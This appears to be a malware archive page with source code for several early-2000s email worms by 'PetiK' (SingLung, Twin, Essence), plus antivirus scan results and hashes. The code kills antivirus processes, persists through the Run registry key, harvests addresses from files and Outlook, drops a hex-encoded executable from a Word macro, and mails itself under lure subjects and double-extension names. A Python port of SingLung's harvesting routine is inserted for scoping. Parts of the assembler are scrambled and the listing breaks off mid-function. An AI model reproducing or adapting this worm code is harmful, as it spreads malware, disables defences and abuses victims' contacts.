StopAV("AVPCC.EXE");     // AVP
StopAV("AVPM.EXE");      // AVP
StopAV("WFINDV32.EXE");  // Dr. Solomon
StopAV("F-AGNT95.EXE");  // F-Secure
StopAV("NAVAPW32.EXE");  // Norton Antivirus
StopAV("NAVW32.EXE");    // Norton Antivirus
StopAV("NMAIN.EXE");     // Norton Antivirus
StopAV("PAVSCHED.EXE");  // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm

GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdr,"\\MSGDI32.EXE"); if((lstrcmp(filename,sysdr))!=0) { Welcome(); } else { hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegCloseKey(hReg); GetWindowsDirectory((char *)winhtm,100); _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0

end_all_asm: } FindFile(desktop,"*.htm"); FindFile(favoris,"*.ht*"); FindFile(personal,"*.ht*"); FindFile(personal,"*.doc"); FindFile(winhtm,".ht*"); FindFile(cache,".ht*"); FreeLibrary(hMAPI); FeedBack(); } strcat(sysdir,"\\MsGDI32.exe"); CopyFile(filename,sysdir,FALSE); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100); RegCloseKey(hReg); } void Welcome() {

register char fileWel[100],messWel[25],titWel[25]; strcpy(fileWel,filename); fileWel[0]=0; for(i=strlen(filename);i>0 && filename[i]!='\\';i--); wsprintf(titWel,"Error - %s",fileWel+i+1); wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1); MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void FindFile(char *folder, char *ext) { register bool abc=TRUE; register HANDLE hFile; char mail[128]; SetCurrentDirectory(folder); hFile=FindFirstFile(ext,&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE); GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { WritePrivateProfileString("EMail found",mail,"send","singlung.txt"); sendmail(mail); } abc=FindNextFile(hFile,&ffile); } } } void GetMail(char *namefile, char *mail) { HANDLE hf,hf2; char *mapped; DWORD size,i,k; BOOL test=FALSE,valid=FALSE; mail[0]=0; hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV E,0); if(hf==INVALID_HANDLE_VALUE) return; size=GetFileSize(hf,NULL); if(!size) return; if(size<8) return; size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) {

CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') valid=TRUE; } i++; } mail[k]=0; } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject="Secret for you..."; mess.lpszNoteText="Hi Friend,\n\n" "I send you my last work.\n" "Mail me if you have some suggests.\n\n" " See you soon. Best Regards."; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName=filename; mess.lpFiles->lpszFileName="My_Work.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } void FeedBack() { GetSystemTime(&systime); switch(systime.wDay) { case 7: MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"

"With this, you stop the life of women and children.", "Message to USA",MB_OK|MB_ICONHAND); break; case 11: dc=GetDC(NULL); if(dc) { TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50); } ReleaseDC(NULL,dc); break; case 28: stopv=fopen("StopIntifada.htm","w"); fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n"); fprintf(stopv,"<body bgcolor=blue text=yellow>\n"); fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n"); fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n"); fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n"); fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n"); fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n"); fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n"); fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n"); fprintf(stopv,"<font>-THE BOTH:</font><BR>\n"); fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n"); fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT ! </font><BR><BR>\n"); fprintf(stopv,"<font>Thanx to read this.</font></p>\n"); fprintf(stopv,"</body></html>"); fclose(stopv); ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED); break; } }
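For scoping an infection the interesting question is which addresses GetMail() above would actually have pulled out of the victim's HTML and DOC files, because its extraction rule is loose: it matches "mailto:" case-insensitively, drops spaces, copies until the next double or single quote (so a "?subject=" part is kept), takes only the first hit per file, and stops scanning 100 bytes before the end of the file. The following is an added example, not from the archive: a Python port of that rule for use on copies of the files, plus a generalisation that returns every hit rather than only the first. SAMPLE_HTML is constructed; the function names are mine.

```python
"""Enumerate the addresses I-Worm.SingLung's GetMail() would harvest from a file.

Added example for incident scoping, not from the archive. harvest_like_singlung()
mirrors the C routine above (case-insensitive "mailto:", spaces dropped, copy stops
at a double or single quote or after 127 bytes, address kept only if it contains "@",
only the first hit per file, files under 8 bytes skipped, scan stops 100 bytes before
EOF). all_mailto_targets() generalises it to every hit in the file. SAMPLE_HTML is
constructed.
"""
from __future__ import annotations

MAILTO = b"mailto:"
QUOTES = (0x22, 0x27)   # '"' and "'" end the copy in the C code
MAX_ADDR = 127          # the C buffer is char mail[128]


def _copy_address(data: bytes, i: int, limit: int) -> tuple[str, int]:
    """Copy an address the way GetMail does; returns (address or "", index after it)."""
    out = bytearray()
    while i < limit and len(out) < MAX_ADDR and data[i] not in QUOTES:
        if data[i] != 0x20:          # spaces are skipped, not terminators
            out.append(data[i])
        i += 1
    addr = out.decode("latin-1")
    return (addr if "@" in addr else ""), i


def _scan_limit(data: bytes) -> int:
    # GetMail does `size -= 100` on a DWORD: for files of 8..99 bytes that wraps and the
    # worm reads past the mapping. Clamped to 0 here (assumption: treat such files as empty).
    return max(len(data) - 100, 0)


def harvest_like_singlung(data: bytes) -> str:
    """The first mailto: address in data, extracted as GetMail() does, or "" if none."""
    if len(data) < 8:
        return ""
    limit = _scan_limit(data)
    for i in range(limit):
        if data[i:i + 7].lower() == MAILTO:
            return _copy_address(data, i + 7, limit)[0]
    return ""


def all_mailto_targets(data: bytes) -> list[str]:
    """Every address the same rule would yield, not just the first (generalisation)."""
    if len(data) < 8:
        return []
    limit = _scan_limit(data)
    found, i = [], 0
    while i < limit:
        if data[i:i + 7].lower() == MAILTO:
            addr, i = _copy_address(data, i + 7, limit)
            if addr:
                found.append(addr)
        else:
            i += 1
    return found


# Constructed HTML as the worm would find it under the Desktop/Favorites/Personal folders
SAMPLE_HTML = (
    b"<html><body>\n"
    b'<a href="MAILTO: alice @example.org">Alice</a>\n'
    b"<a href='mailto:bob@example.net?subject=hi'>Bob</a>\n"
    b'<a href="mailto:no-at-sign">broken</a>\n'
    b"</body></html>\n"
    + b"<!-- " + b"x" * 120 + b" -->\n"     # padding so the 100-byte tail rule does not hide the links
)

if __name__ == "__main__":
    print("worm would mail:", harvest_like_singlung(SAMPLE_HTML))
    print("all exposed:    ", all_mailto_targets(SAMPLE_HTML))
```

Two details of the source narrow the scope further. Only the Desktop (*.htm), Favorites (*.ht*) and Personal (*.ht*, *.doc) folders yield targets: the calls FindFile(winhtm,".ht*") and FindFile(cache,".ht*") pass a pattern with no leading *, so the Windows directory and the IE cache are effectively never searched. And the address is used verbatim as the MAPI recipient, query string included, so "bob@example.net?subject=hi" above would have gone out as written and most likely bounced.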

File SingLung.exe received on 05.16.2009 19:40:32 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Email-Worm.Win32.Stopin!IK Win32/Stopin.worm.29184 Worm/Stopin.A Worm/Win32.Stopin Win32:Stopin I-Worm/Stopin Win32.StopIn.A@mm I-Worm.Stopin.a W32.Stopin.b Worm.Win32.Stopin.B Win32.HLLM.Stopin.60928 Win32.Stopin.a Win32/Stopin.B Email-Worm.Win32.Stopin.a W32/Stopin.B Win32.StopIn.A@mm Email-Worm.Win32.Stopin Email-Worm.Win32.Stopin.a Email-Worm.Win32.Stopin.a W32/Stopin.b@MM W32/Stopin.b@MM Worm.Stopin.A Worm:Win32/Petick.W@mm Win32/Stopin.B W32/Stopin.A Worm/W32.Stopin.29184 W32/Stopin.A I-Worm.Stopin.A Medium Risk Malware Worm.Singlung.a W32/Stopin-A Email-Worm.Win32.Stopin.a W95.Pet_Tick.gen W32/Stopin.a PAK_Generic.001 Win32.HLLW.Stopin I-Worm.Win32.Stopin I-Worm.Stopin.A

Additional information
File size: 29184 bytes
MD5: 460f48b7d7bde2517c1a9a9042682f28
SHA1: f6ced460439e443aa957c2765328f3b99dcdd252
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser


Name : W97M-W32.Twin
Author : PetiK
Language : VBA Word & Assembler
Date : 01/02/2002
Size : 2701 bytes

Attribute VBA_ModuleType=VBAModule Sub twin Sub AutoOpen() win = Environ("windir") thisfile = ActiveDocument.Name full = ActiveDocument.FullName MsgBox "This file has some problems", vbCritical, thisfile e e e e e = = = = = "exe=""" e + "4D5A50000200000..." e + "000...000000000000" e + "0000000000" e + """"

f = "fso.CopyFile """ f = f + full f = f + """, win&""\NetInfo.doc""" Open "C:\Twin.vbs" For Output As #1 Print #1, "On Error Resume Next" Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")" Print #1, "Set w=CreateObject(""WScript.Shell"")" Print #1, "Set win=fso.GetSpecialFolder(0)" Print #1, "Set Twin=CreateObject(""Outlook.Application"")" Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")" Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")" Print #1, "c.Close" Print #1, "For Each polux In deux.AddressLists" Print #1, "If polux.AddressEntries.Count <> 0 Then" Print #1, "For jumeaux = 1 To polux.AddressEntries.Count" Print #1, "Set castor = polux.AddressEntries(jumeaux)" Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)" Print #1, "c.WriteLine castor.Address" Print #1, "c.Close" Print #1, "Next" Print #1, "End If" Print #1, "Next" Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)" Print #1, "c.WriteLine ""#""" Print #1, "c.Close" Print #1, "" Print #1, e Print #1, "lire=decr(exe)" Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)" Print #1, "exfile.Write lire" Print #1, "exfile.Close" Print #1, f Print #1, "w.Run win&""\AVW32.exe"", 1, False" Print #1, "Function decr(octet)" Print #1, "For hexa = 1 To Len(octet) Step 2" Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))" Print #1, "Next" Print #1, "End Function" Close #1 Shell "wscript C:\Twin.vbs", vbHide End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "Message for " & Application.UserName & vbCrLf & "How Are You" .Heading = "W97M/W32ASM.Twin.Worm" .Animation = msoAnimationSendingMail .Button = msoButtonSetOK .Show End With End Sub

End Sub W32 ASM CODE OF THE HEX FILE INTO WORD DOCUMENT comment # Name : I-Worm.Twin Author : PetiK Date : January 30th 2002 - February 1st 2002 Size : 6656 bytes Action : See yourself. It's not complex. # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: mov push push api push 50 esi,offset orig_worm esi 0 GetModuleFileNameA

push 25 push esi push 1 @pushsz "AntiVirus Freeware" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA @pushsz "C:\twin.vbs" api DeleteFileA push 50 push offset pathname api GetWindowsDirectoryA @pushsz "\NetInfo.doc" push offset pathname api lstrcat verif_inet: push push api dec jnz 0 offset inet InternetGetConnectedState eax verif_inet

push 0 push 0 push 3 push 0 push 1 push 80000000h @pushsz "C:\backup.win" api CreateFileA inc eax je end_worm dec eax xchg ebx,eax push push push push push push 0 0 0 2 0 ebx

api test je xchg push push push push push api test je xchg push push api cmp jbe

CreateFileMappingA eax,eax end_w1 eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_w2 eax,esi 0 ebx GetFileSize eax,3 end_w3

scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_w3: api end_w2: api end_w1: api end_worm: push api send_mail: xor push push push push push api ret .data orig_worm push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle

0 ExitProcess eax,eax eax eax offset Message eax [sess] MAPISendMail

db 50 dup (0)

pathname mail_addr inet sess subject body filename Message

db db dd dd

50 dup (0) 128 dup (?) 0 0

db "A comical story for you.",0 db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah db 9,"Best Regards. You friend.",0 db "comical_story.doc",0 dd dd dd dd dd dd dd dd dd dd dd dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? dd dd dd dd dd ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset pathname offset filename ?

MsgFrom

MsgTo

dd dd dd dd dd dd dd dd dd dd dd

Attach

end start end MODULE VBA TWIN IN WORD DOCUMENT

File Twin.exe received on 05.16.2009 19:41:08 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Email-Worm.Win32.Petik!IK Win32/Comical.worm.6656 Worm/Petik.AV.10 Worm/Win32.Win32 W32/Malware!2f2b Win32:Comical W97M/Comical.EXE Win32.Comical.A@mm I-Worm.Petik Worm.Win32.Comical.A Win32.Petik.8192 Suspicious File Win32/Comical.A W32/Malware!2f2b Email-Worm.Win32.Petik W32/Petik.PL@mm Win32.Comical.A@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/Comical@MM W32/Comical@MM Worm.Petik.AV.10 Worm:Win32/Comical.A@mm Win32/Comical.A W32/Petik.AR Worm/W32.Petik.6656.B Worm Generic I-Worm.Conical.A High Risk Worm Worm.Mail.Petik.h W32/Comical-A W32.Comical@mm W32.Comical@mm W32/Comical@MM WORM_COMICAL.A Win32.Worm.Twin I-Worm.Conical.A

Additional information
File size: 6656 bytes
MD5: 3da254ab9def856d64f0779ea6a6057f
SHA1: 31a005985a793d2b8e84dd747c3fa17c721ddf60
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

File Twin.doc received on 05.16.2009 19:41:06 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Email-Worm.Win32.Petik!IK W97M/Comical W2000M/Comical.A@mm Worm/Win32.Petik W97M/Comical.A@mm MW97:Comical-A W97M/Comical Win32.Comical.A(W97M) Unclassified Malware W97M.Petik O97M.GNsm W97M/Comical.A:mm W97M/Comical.A@mm Email-Worm.Win32.Petik W97M/Comical.A@mm Win32.Comical. Email-Worm.Win32.Petik Macro.Comical Email-Worm.Win32.Petik W97M/Comical@MM W97M/Comical@MM Macro.Comical.A Virus:W97M/Comical.A@mm W97M/Comical.A W97M/Comical.A@mm Win32.Comical.A(W97M) W97M/Generic WORD.97.Conical.A Unknown Micro Virus WM97/Comical-A W97M.Comical@mm W97M_COMICAL.A Virus.W97M.Petik W97M.Comical.A WORD.97.Conical.A

Additional information
File size: 65536 bytes
MD5: 079275bdaf0058642f3b062b3aef4de3
SHA1: 0fe4a31077176828ec545b7ca3c5e92ea59a7352
SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595

/* Name : I-Worm.Essence Author : PetiK Date : February 3rd 2002 Language : C++ Thanx to Bumblebee. */ #include <windows.h> #include <mapi.h> #include <memory.h> #pragma argused void Welcome(); void attachname(); void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr); char filename[100],sysdir[100],sysdr[100],attname[20]; LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HINSTANCE LHANDLE MapiMessage char char hMAPI; sess; *mess; messId[512]; subject[1024], address[1024], server[1024], body[8192]; i,j; *tmp; msg; hReg; (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mSaveMail)(LHANDLE, ULONG, lpMapiMessage, FLAGS, ULONG, LPTSTR); *mFreeBuffer)(LPVOID);

long char MSG HKEY ULONG ULONG ULONG ULONG ULONG ULONG ULONG

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdr,"\\MSIE32.EXE"); if((lstrcmp(filename,sysdr))!=0) { Welcome(); strcat(sysdir,"\\Msie32.exe"); CopyFile(filename,sysdir,FALSE); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100); RegCloseKey(hReg); // WriteProfileString("WINDOWS","RUN",sysdir); // WriteProfileString(NULL,NULL,NULL); return 0; } hMAPI=LoadLibrary("MAPI32.DLL"); if(!hMAPI) return -1; (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); if(!mLogon) return -1; (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); if(!mLogoff) return -1; (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); if(!mFindNext) return -1; (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");

if(!mReadMail) return -1; (FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail"); if(!mSaveMail) return -1; (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); if(!mSendMail) return -1; (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); if(!mFreeBuffer) return -1; mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess); SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST); while(GetMessage(&msg,NULL,0,0)) if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID| MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { if(lstrlen(mess->lpszSubject)>2) if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess>lpszSubject[strlen(mess->lpszSubject)-2]!=' ') { mFreeBuffer(mess); SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST); if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { body[0]=0; if(mess->lpszNoteText) { wsprintf(body,"Hi '%s', you wrote me :\n##########\n- ",mess>lpOriginator->lpszName); for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) { body[j]=mess->lpszNoteText[i]; if(body[j]=='\n') { body[j]=0; lstrcat(body,"\n- "); j+=2; } } body[j]=0; } for(i=0;j<lstrlen(address) && address[i]!='@';i++); if(i>lstrlen(address)) wsprintf(body,"smtp.%s",address+i+1); else wsprintf(body,"smtp.yahoo.com"); if(j>=512) lstrcat(body,"..."); else lstrcat(body," "); wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server); lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if you have some suggests.\n\n"); wsprintf(subject,"Re: %s ",mess->lpszSubject); wsprintf(address,"%s",mess->lpOriginator->lpszAddress); MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION); sendmail(sess,subject,body,address); tmp=(char *)malloc(strlen(mess->lpszSubject)+3); strcpy(tmp,mess->lpszSubject); free(mess->lpszSubject); tmp[strlen(tmp)+2]=0; tmp[strlen(tmp)]=' '; tmp[strlen(tmp)-1]=' '; 
mess->lpszSubject=tmp; mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId); mFreeBuffer(mess); SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST); } } else mFreeBuffer(mess); } } while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID| MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS); } mLogoff(sess,0,0,0); FreeLibrary(hMAPI); }

void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr) { char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday", "hello","ForU","important"}; char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs", ".zip",".rar"}; char *ext2[]={".exe",".com",".pif",".scr"}; attname[0]=0; strcat(attname,name[GetTickCount()&8]); strcat(attname,ext1[GetTickCount()&10]); strcat(attname,ext2[GetTickCount()&3]); MapiMessage mes; MapiRecipDesc from; memset(&mes,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mes.lpszSubject=msubject; mes.lpszNoteText=mbody; mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mes.lpRecips) return; memset(mes.lpRecips,0,sizeof(MapiRecipDesc)); mes.lpRecips->lpszName=mailaddr; mes.lpRecips->lpszAddress=mailaddr; mes.lpRecips->ulRecipClass=MAPI_TO; mes.nRecipCount=1; mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mes.lpFiles) return; 